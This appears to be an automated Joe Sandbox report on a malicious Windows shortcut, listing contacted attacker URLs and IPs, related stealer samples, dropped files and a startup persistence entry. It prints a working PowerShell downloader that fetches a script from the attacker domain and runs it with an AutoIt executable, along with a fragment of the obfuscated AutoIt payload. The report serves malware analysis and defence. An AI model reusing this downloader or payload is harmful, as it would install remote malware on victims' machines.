https://tiffany-careers.com/qJXhX	powershell.exe, 00000009.00000002.1579963511.000001FB58BEB000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://tiffany-careers.com/qJXhXwR.ex	powershell.exe, 00000009.00000002.1579963511.000001FB58BEB000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contoso.com/	powershell.exe, 00000015.00000002.1752565815.00000234E63C2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://nuget.org/nuget.exe	powershell.exe, 00000009.00000002.1654631616.000001FB6813F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1932290958.00000234F4B35000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1752565815.00000234E63C2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://tiffany-careers.com/Ghep2712x	powershell.exe, 00000005.00000002.1412141272.000002C8BB632000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://oneget.orgX	powershell.exe, 00000015.00000002.1752565815.00000234E6132000.00000004.00000800.00020000.00000000.sdmp	false		high
https://tiffany-careers.com/Ghep2712ent	mshta.exe, 00000006.00000002.1734179559.000001CA44DA8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1732782956.000001CA44DA8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://tiffany-careers.com/Ghep2712...	mshta.exe, 00000006.00000002.1735347435.000001D2479B0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1732670333.000001D247A7D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000002.1735799649.000001D247A7E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1722333655.000001D247A7C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://tiffany-careers.com/qJXhXwR.	powershell.exe, 00000009.00000002.1579963511.000001FB58BEB000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://tiffany-careers.com/qJXhXw	powershell.exe, 00000009.00000002.1579963511.000001FB58BEB000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://tiffany-careers.com/Ghep2712_	mshta.exe, 00000006.00000002.1734179559.000001CA44DA8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1732782956.000001CA44DA8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://tiffany-careers.com/Ghep2712rnationali	mshta.exe, 00000006.00000002.1734179559.000001CA44DA8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1732782956.000001CA44DA8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://tiffany-careers.com/Ghep2712userLOCALAPPpy	mshta.exe, 00000006.00000002.1734011062.000001CA44D60000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000005.00000002.1413336162.000002C8BD5CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1579963511.000001FB580D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1752565815.00000234E4AC1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://tiffany-careers.com/Ghep2712l	mshta.exe, 00000006.00000003.1727135486.000001CA44DBE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1723431987.000001CA44DBD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000002.1734217919.000001CA44DBE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://tiffany-careers.com/Ghep2712h	powershell.exe, 00000005.00000002.1413336162.000002C8BDA19000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://tiffany-careers.com/q	powershell.exe, 00000009.00000002.1579963511.000001FB58BEB000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.autoitscript.com/autoit3/J	Guard.exe, 00000017.00000003.1715203306.0000000004CE0000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000017.00000002.2628286184.00000000009B9000.00000002.00000001.01000000.00000010.sdmp, SwiftWrite.pif, 0000001B.00000002.2628389026.00000000001F9000.00000002.00000001.01000000.00000011.sdmp, SwiftWrite.pif.23.dr	false		high
http://nuget.org/NuGet.exe	powershell.exe, 00000009.00000002.1654631616.000001FB6813F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1932290958.00000234F4B35000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1752565815.00000234E63C2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0	powershell.exe, 00000015.00000002.1752565815.00000234E6132000.00000004.00000800.00020000.00000000.sdmp	false		high
https://tiffany-careers.com/Ghep2712CPL	powershell.exe, 00000005.00000002.1412646276.000002C8BB7D0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://tiffany-careers.c	powershell.exe, 00000009.00000002.1579963511.000001FB58BEB000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000015.00000002.1752565815.00000234E633C000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000015.00000002.1752565815.00000234E633C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://go.micro	powershell.exe, 00000015.00000002.1752565815.00000234E5C2B000.00000004.00000800.00020000.00000000.sdmp	false		high
https://tiffany-careers.com/qJXhXwR	powershell.exe, 00000009.00000002.1579963511.000001FB58BEB000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contoso.com/Icon	powershell.exe, 00000015.00000002.1752565815.00000234E63C2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://tiffany-careers.com/	mshta.exe, 00000006.00000002.1734217919.000001CA44DF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1723431987.000001CA44DF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1727135486.000001CA44DF7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1579963511.000001FB58BEB000.00000004.00000800.00020000.00000000.sdmp	false		high
https://tiffany-careers.com/Ghep2712https://tiffany-careers.com/Ghep2712	mshta.exe, 00000006.00000003.1729696758.000001D24D985000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.ver)	svchost.exe, 00000008.00000002.2633153467.0000023948800000.00000004.00000020.00020000.00000000.sdmp	false		high
https://tiffany-careers.com/Ghep2712:asLMEMP	mshta.exe, 00000006.00000002.1736392395.000001D24D5BE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/Pester/Pester	powershell.exe, 00000015.00000002.1752565815.00000234E633C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://g.live.com/odclientsettings/Prod-C:	qmgr.db.8.dr	false		high
https://tiffany-careers.com/qJXh	powershell.exe, 00000009.00000002.1579963511.000001FB58BEB000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://g.live.com/odclientsettings/ProdV2-C:	svchost.exe, 00000008.00000003.1448523354.0000023948670000.00000004.00000800.00020000.00000000.sdmp	false		high
https://tiffany-careers.co	powershell.exe, 00000009.00000002.1579963511.000001FB58BEB000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://aka.ms/pscore68	powershell.exe, 00000005.00000002.1413336162.000002C8BD5CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1413336162.000002C8BD5B9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1579963511.000001FB580D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1752565815.00000234E4AC1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tiffany-careers.com	powershell.exe, 00000009.00000002.1579963511.000001FB58BEB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1752565815.00000234E60EB000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://oneget.org	powershell.exe, 00000015.00000002.1752565815.00000234E6132000.00000004.00000800.00020000.00000000.sdmp	false		high
https://tiffany-careers.com/Ghep2712&	mshta.exe, 00000006.00000003.1727135486.000001CA44DBE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1723431987.000001CA44DBD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000002.1734217919.000001CA44DBE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://tiffany-careers.com/qJXhXwR.e	powershell.exe, 00000009.00000002.1579963511.000001FB58BEB000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
147.45.49.155	tiffany-careers.com	Russian Federation		2895	FREE-NET-ASFREEnetEU	false

Private

IP
127.0.0.1

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1581591
Start date and time:	2024-12-28 09:34:18 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 10m 34s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	31
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	tzA45NGAW4.lnk renamed because original name is a hash value
Original Sample Name:	1fa8842a7e4debf7bf9e6c03773aa49c.lnk
Detection:	MAL
Classification:	mal100.expl.evad.winLNK@43/73@5/2
EGA Information:	Successful, ratio: 42.9%
HCA Information:	Successful, ratio: 99% Number of executed functions: 99 Number of non-executed functions: 276
Cookbook Comments:	Found application associated with file extension: .lnk

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 23.218.208.109, 23.218.208.137, 162.159.61.3, 172.64.41.3, 54.224.241.105, 34.237.241.83, 50.16.47.176, 18.213.11.84, 23.195.39.65, 199.232.210.172, 23.32.238.130, 2.19.198.75, 2.16.188.171, 2.20.40.170, 20.109.210.53, 4.245.163.56
Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, fs.microsoft.com, e8652.dscx.akamaiedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, acroipm2.adobe.com.edgesuite.net, e4578.dscb.akamaiedge.net, ctldl.windowsupdate.com, p13n.adobe.io, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, acroipm2.adobe.com, fe3cr.delivery.mp.microsoft.com, ssl.adobe.com.edgekey.net, armmf.adobe.com, ssl-delivery.adobe.com.edgekey.net, e16604.g.akamaiedge.net, a122.dscd.akamai.net, prod.fs.microsoft.com.akadns.net, geo2.adobe.com, wu-b-net.trafficmanager.net, crl.root-x1.letsencrypt.org.edgekey.net
Execution Graph export aborted for target mshta.exe, PID 7728 because there are no executed function
Execution Graph export aborted for target powershell.exe, PID 7640 because it is empty
Execution Graph export aborted for target powershell.exe, PID 7648 because it is empty
Execution Graph export aborted for target powershell.exe, PID 7952 because it is empty
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
03:35:14	API Interceptor	1x Sleep call for process: WMIC.exe modified
03:35:20	API Interceptor	2x Sleep call for process: svchost.exe modified
03:35:22	API Interceptor	129x Sleep call for process: powershell.exe modified
03:35:38	API Interceptor	2x Sleep call for process: AcroCEF.exe modified
03:36:23	API Interceptor	1668x Sleep call for process: Guard.exe modified
03:36:44	API Interceptor	420x Sleep call for process: SwiftWrite.pif modified
08:35:49	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
147.45.49.155	R8CAg00Db8.lnk	Get hash	malicious	Unknown	Browse	tiffany-careers.com/PefjSkkhb.exe
	s4PymYGgSh.lnk	Get hash	malicious	Unknown	Browse	tiffany-careers.com/BFmcYQ.exe
	duyba.lnk.download.lnk	Get hash	malicious	Unknown	Browse	tiffany-careers.com/PefjSkkhb.exe

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
bg.microsoft.map.fastly.net	sYPORwmgwQ.exe	Get hash	malicious	Unknown	Browse	199.232.214.172
	New Upd v1.1.0.exe	Get hash	malicious	LummaC	Browse	199.232.214.172
	JA7cOAGHym.exe	Get hash	malicious	Vidar	Browse	199.232.214.172
	wp.bat	Get hash	malicious	Unknown	Browse	199.232.210.172
	final.exe	Get hash	malicious	Meterpreter	Browse	199.232.214.172
	n5Szx8qsFB.lnk	Get hash	malicious	Unknown	Browse	199.232.214.172
	A4FY1OA97K.lnk	Get hash	malicious	DanaBot	Browse	199.232.214.172
	vreFmptfUu.lnk	Get hash	malicious	DanaBot	Browse	199.232.210.172
	54861 Proforma Invoice AMC2273745.xlam.xlsx	Get hash	malicious	Unknown	Browse	199.232.214.172
	6ee7HCp9cD.exe	Get hash	malicious	Quasar	Browse	199.232.214.172
tiffany-careers.com	TCKxnQ5CPn.exe	Get hash	malicious	Unknown	Browse	147.45.49.155
	n5Szx8qsFB.lnk	Get hash	malicious	Unknown	Browse	147.45.49.155
	nTyPEbq9wQ.lnk	Get hash	malicious	Unknown	Browse	147.45.49.155
	7A2lfjTYNf.lnk	Get hash	malicious	Unknown	Browse	147.45.49.155
	6fW0guYpsH.lnk	Get hash	malicious	Unknown	Browse	147.45.49.155
	FzmtNV0vnG.lnk	Get hash	malicious	Unknown	Browse	147.45.49.155
	lKin1m7Pf2.lnk	Get hash	malicious	Unknown	Browse	147.45.49.155
	R4qP4YM0QX.lnk	Get hash	malicious	Unknown	Browse	147.45.49.155
	R8CAg00Db8.lnk	Get hash	malicious	Unknown	Browse	147.45.49.155
	s4PymYGgSh.lnk	Get hash	malicious	Unknown	Browse	147.45.49.155

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
FREE-NET-ASFREEnetEU	soft 1.14.exe	Get hash	malicious	Meduza Stealer	Browse	147.45.44.216
	iviewers.dll	Get hash	malicious	LummaC	Browse	147.45.44.131
	search.hta	Get hash	malicious	Unknown	Browse	147.45.112.248
	e9aa0b4540115b3dcec3af70b6de27e54e4a0fa96d1d3.exe	Get hash	malicious	RedLine	Browse	147.45.44.224
	TCKxnQ5CPn.exe	Get hash	malicious	Unknown	Browse	147.45.49.155
	good.exe	Get hash	malicious	PureLog Stealer, zgRAT	Browse	147.45.44.151
	n5Szx8qsFB.lnk	Get hash	malicious	Unknown	Browse	147.45.49.155
	7ZAg3nl9Fu.exe	Get hash	malicious	Unknown	Browse	147.45.44.166
	7ZAg3nl9Fu.exe	Get hash	malicious	Unknown	Browse	147.45.44.166
	HOrW5twCLd.exe	Get hash	malicious	XenoRAT	Browse	147.45.69.75

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	lumma.ps1	Get hash	malicious	LummaC	Browse	147.45.49.155
	Titan.exe	Get hash	malicious	Unknown	Browse	147.45.49.155
	Titan.exe	Get hash	malicious	Unknown	Browse	147.45.49.155
	SharcHack.exe	Get hash	malicious	Ades Stealer, BlackGuard, NitroStealer, VEGA Stealer	Browse	147.45.49.155
	iviewers.dll	Get hash	malicious	LummaC	Browse	147.45.49.155
	Flasher.exe	Get hash	malicious	Luca Stealer, Rusty Stealer	Browse	147.45.49.155
	738KZNfnzz.exe	Get hash	malicious	LummaC	Browse	147.45.49.155
	TCKxnQ5CPn.exe	Get hash	malicious	Unknown	Browse	147.45.49.155
	OiMp3TH.exe	Get hash	malicious	LummaC	Browse	147.45.49.155
	n5Szx8qsFB.lnk	Get hash	malicious	Unknown	Browse	147.45.49.155
37f463bf4616ecd445d4a1937da06e19	soft 1.14.exe	Get hash	malicious	Meduza Stealer	Browse	147.45.49.155
	solara-executor.exe	Get hash	malicious	Unknown	Browse	147.45.49.155
	Setup.exe	Get hash	malicious	Unknown	Browse	147.45.49.155
	Setup.exe	Get hash	malicious	Unknown	Browse	147.45.49.155
	setup.msi	Get hash	malicious	Unknown	Browse	147.45.49.155
	search.hta	Get hash	malicious	Unknown	Browse	147.45.49.155
	TrdIE26br9.msi	Get hash	malicious	Unknown	Browse	147.45.49.155
	JA7cOAGHym.exe	Get hash	malicious	Vidar	Browse	147.45.49.155
	T4qO1i2Jav.exe	Get hash	malicious	LummaC Stealer	Browse	147.45.49.155
	EB2UOXRNsE.exe	Get hash	malicious	Unknown	Browse	147.45.49.155

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\Public\Guard.exe	TCKxnQ5CPn.exe	Get hash	malicious	Unknown	Browse
	n5Szx8qsFB.lnk	Get hash	malicious	Unknown	Browse
	nTyPEbq9wQ.lnk	Get hash	malicious	Unknown	Browse
	7A2lfjTYNf.lnk	Get hash	malicious	Unknown	Browse
	6fW0guYpsH.lnk	Get hash	malicious	Unknown	Browse
	FzmtNV0vnG.lnk	Get hash	malicious	Unknown	Browse
	lKin1m7Pf2.lnk	Get hash	malicious	Unknown	Browse
	R4qP4YM0QX.lnk	Get hash	malicious	Unknown	Browse
	R8CAg00Db8.lnk	Get hash	malicious	Unknown	Browse
	s4PymYGgSh.lnk	Get hash	malicious	Unknown	Browse

Created / dropped Files

C:\ProgramData\Microsoft\Network\Downloader\edb.log

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	0.4932300105581798
Encrypted:	false
SSDEEP:	1536:cJNnm0h6QV70hV40h5RJkS6SNJNJbSMeCXhtvKTeYYJyNtEBRDna33JnbgY1Ztap:cJhXC9lHmutpJyiRDeJ/aUKrDgnm7
MD5:	1FD366555DE474B6A9908EA81EE55DD8
SHA1:	7C2E69AF94F404FCF7DE3007CB5C476B3F2551B9
SHA-256:	D303BC6045958AD1F330F789E78D51955E116F92E67CABC600600B3299A06F93
SHA-512:	30C93F358044AB4A0B7393529DE57A95F69AE89ACA12477A10087EF242559B1277086924701751A7625E7B27CFD94B5EAA569E36E20680F6E014390C7B15F493
Malicious:	false
Preview:	^.;V........@..@-....{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@...................................&.#.\.#.........`h.................h.......0.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	Extensible storage engine DataBase, version 0x620, checksum 0xec483524, page size 16384, DirtyShutdown, Windows version 10.0
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	0.7217515043657398
Encrypted:	false
SSDEEP:	1536:LSB2ESB2SSjlK/Tv5m0hnRJjAVtu8Ykr3g16tV2UPkLk+kcBLZiAcZwytuknSDVd:LazaNvFv8V2UW/DLzN/w4wZi
MD5:	38A5068256BF160B74A4ED7CC345C9B5
SHA1:	53334BCB4821C5E7F19F4128139BDE305446C276
SHA-256:	D26B71853FE3573565FE0A459170170131140A462B31E97A5FC9A3A7FD582676
SHA-512:	B5D8A3680858BFB266F847AA0E18DE13C18D60211BE6DD3BBC4C67758069CDB10D65A206A652E70A09146E112390A6AF04B801F327F7C388E8E83B4EDB511D31
Malicious:	false
Preview:	.H5$... ...............X\...;...{......................p.D..........{}..#...\|..h.F.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... .......-....{...............................................................................................................................................................................................2...{..................................N....#...\|..................3.}..#...\|...........................#......h.F.....................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	16384
Entropy (8bit):	0.08124998767331314
Encrypted:	false
SSDEEP:	3:eW/lKYeGdNgr/fgsCrZClW/taE3k1all+SHY/Xl+/rQLve:eyKzCNKfgs3GbUQAS4M
MD5:	3E956096AFF3AD65DCBF13C7B391356F
SHA1:	93449F2BF4A29A9CE495BBB033E4DDC034443116
SHA-256:	B4E14F8388F3E32914F6E94DD739EFC5F33D832F9BFA7A5A4E2027D3FAAF0C6E
SHA-512:	4BA89446E6250C626D650FBE804E53A7E38A2E919C8B522B6E76D015D589B0F758DB867F23BC659F3E442E7107C3CC9B1A9270281CCC7856335B98F8277882AA
Malicious:	false
Preview:	..D......................................;...{...#...\|.......{}..............{}......{}.vv_Q.....{}.................3.}..#...\|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\Public\Guard.exe

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	893608
Entropy (8bit):	6.62028134425878
Encrypted:	false
SSDEEP:	12288:WpV0etV7qtINsegA/rMyyzlcqakvAfcN9b2MyZa31tqoPTdFbgawV2501:WTxz1JMyyzlohMf1tN70aw8501
MD5:	18CE19B57F43CE0A5AF149C96AECC685
SHA1:	1BD5CA29FC35FC8AC346F23B155337C5B28BBC36
SHA-256:	D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
SHA-512:	A0C58F04DFB49272A2B6F1E8CE3F541A030A6C7A09BB040E660FC4CD9892CA3AC39CF3D6754C125F7CD1987D1FCA01640A153519B4E2EB3E3B4B8C9DC1480558
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 8%
Joe Sandbox View:	Filename: TCKxnQ5CPn.exe, Detection: malicious, Browse Filename: n5Szx8qsFB.lnk, Detection: malicious, Browse Filename: nTyPEbq9wQ.lnk, Detection: malicious, Browse Filename: 7A2lfjTYNf.lnk, Detection: malicious, Browse Filename: 6fW0guYpsH.lnk, Detection: malicious, Browse Filename: FzmtNV0vnG.lnk, Detection: malicious, Browse Filename: lKin1m7Pf2.lnk, Detection: malicious, Browse Filename: R4qP4YM0QX.lnk, Detection: malicious, Browse Filename: R8CAg00Db8.lnk, Detection: malicious, Browse Filename: s4PymYGgSh.lnk, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R..R..R...C..P.....S.._@..a.._@....._@..g..[j..[..[j..w..R.+.r...........S.._@..S..R...P.....S..RichR.*.........................PE..L...._pZ.........."...............................@.......................................@...@.......@.........................\|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B................................................................................................................................................................................................................................................................................

C:\Users\Public\PublicProfile.ps1

Download File

Process:	C:\Users\user\AppData\Roaming\qJXhXwR.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	492
Entropy (8bit):	5.1704102943954
Encrypted:	false
SSDEEP:	12:fZ9HFEoFnV/9LBzFj0zUQbnRS6SxJMnCPTFM:f3CknZ9LzjYnRSb8Cba
MD5:	F6AD1324042B3E4B5160A5569791A675
SHA1:	80C890990A9E13DB5A48BCD4FDCF5C078FAACB47
SHA-256:	C353AFF49A68150B2031E12279750931F6944AF480B97C8C0FC2BF1E1DBBA6D3
SHA-512:	67FF05FB7F2406F08A87A6ACFEB143D891B1E3563BF0579039F04C6C1C221195DCFD38F7EF7C5AFAABBDF18310DBA6FD1ED3FCF76F8A5C0FB1916834E9FA76A9
Malicious:	true
Preview:	[string]$fU5L = "https://tiffany-careers.com/tlUmNmGG.txt"..[string]$oF6L = "C:\Users\Public\Secure.au3"..[string]$exePath = "C:\Users\Public\Guard.exe"....# Download the content from the URL..$wResp = New-Object System.Net.WebClient..$fCont = $wResp.DownloadString($fU5L)....# Save the downloaded content to the output file..Set-Content -Path $oF6L -Value $fCont -Encoding UTF8....# Run the executable with the output file as an argument..Start-Process -FilePath $exePath -ArgumentList $oF6L

C:\Users\Public\Secure.au3

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with very long lines (1266)
Category:	dropped
Size (bytes):	1154951
Entropy (8bit):	5.1965877036323125
Encrypted:	false
SSDEEP:	12288:28V+jcfS29nYfCcNjZT5aJ0/fr0UFsgcBQuflmJSRfGtRd:qc19nY36OfgUPYl3YB
MD5:	89CE06D70EDB0FFF9F11B3A84859CBB4
SHA1:	C57C0511811F56AB9DABDA858BE102FA24A2492C
SHA-256:	4CCF05CF8EE2CDEC41AFCD3FC2651DB74C43070B3273BE8BF0B11B72F921B6A4
SHA-512:	C873FF8417DE7A65D753331186B05AA559A7F268442008E4313CE8985C1611DB58B8FBD55A9C1B262243D7ED6A28ABEAAF575718989D4B2D2441B03A744FE660
Malicious:	true
Preview:	.Func NutritionSpeedMayorFamilies($SmKiss, $EfficientlyFormula, $ConsultingSortsLabs, $furtherterrorist, $BIKEOCCURRENCESLIGHT, $ReversePhilippines).$PdBlocksResponseDat = '739119618772'.$VerifiedUnderstoodValidation = 34.$iosymphonyseemscrucial = 50.For $OdHBt = 28 To 865.If $VerifiedUnderstoodValidation = 32 Then.Sqrt(7955).FileExists(Wales("73]113]116]120]125]36]81]36]72]109]119]116]121]120]105]36",12/3)).$VerifiedUnderstoodValidation = $VerifiedUnderstoodValidation + 1.EndIf.If $VerifiedUnderstoodValidation = 33 Then.ConsoleWriteError(Wales("75]106]103]119]122]102]119]126]48]74]125]121]119]102]48",25/5)).DriveStatus(Wales("87]72]79]72]70]82]80]80]88]81]76]70]68]87]76]82]81]86]67]71]72]86]76]85]72]67",6/2)).Dec(Wales("92]77]84]52]70]82]70]95]84]83]72]84]90]80]52]71]90]73]70]85]74]88]89]52]90]83]78]89]88]52",5/1)).$VerifiedUnderstoodValidation = $VerifiedUnderstoodValidation + 1.EndIf.If $VerifiedUnderstoodValidation = 34 Then.$NuttenInvestorsRaleigh = Dec(Wales("104]113]105]86]85]

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	290
Entropy (8bit):	5.256194283035947
Encrypted:	false
SSDEEP:	6:cGq2PqLTwi2nKuAl9OmbnIFUt8PwZmw+P4kwOqLTwi2nKuAl9OmbjLJ:fv8wZHAahFUt84/+g5TwZHAaSJ
MD5:	263ADD6631C31351B4DEE121EF570820
SHA1:	C05D7E4A9915559BA6ABC76D593B0263108E0E6D
SHA-256:	1BF1FB1234457B345349CCE0703918D167875B08DDB0777FF4169D8ABE6E8358
SHA-512:	33E8305E950211EE3040F9FB85913115DE57E550ACE29DD4D8B7F290377CCDD82E88D10110EB9CB8473808E941B56EDCBE46A6C97B49015F344D8F8BF46EBC2A
Malicious:	false
Preview:	2024/12/28-03:35:27.286 1460 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/12/28-03:35:27.289 1460 Recovering log #3.2024/12/28-03:35:27.289 1460 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old (copy)

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	290
Entropy (8bit):	5.256194283035947
Encrypted:	false
SSDEEP:	6:cGq2PqLTwi2nKuAl9OmbnIFUt8PwZmw+P4kwOqLTwi2nKuAl9OmbjLJ:fv8wZHAahFUt84/+g5TwZHAaSJ
MD5:	263ADD6631C31351B4DEE121EF570820
SHA1:	C05D7E4A9915559BA6ABC76D593B0263108E0E6D
SHA-256:	1BF1FB1234457B345349CCE0703918D167875B08DDB0777FF4169D8ABE6E8358
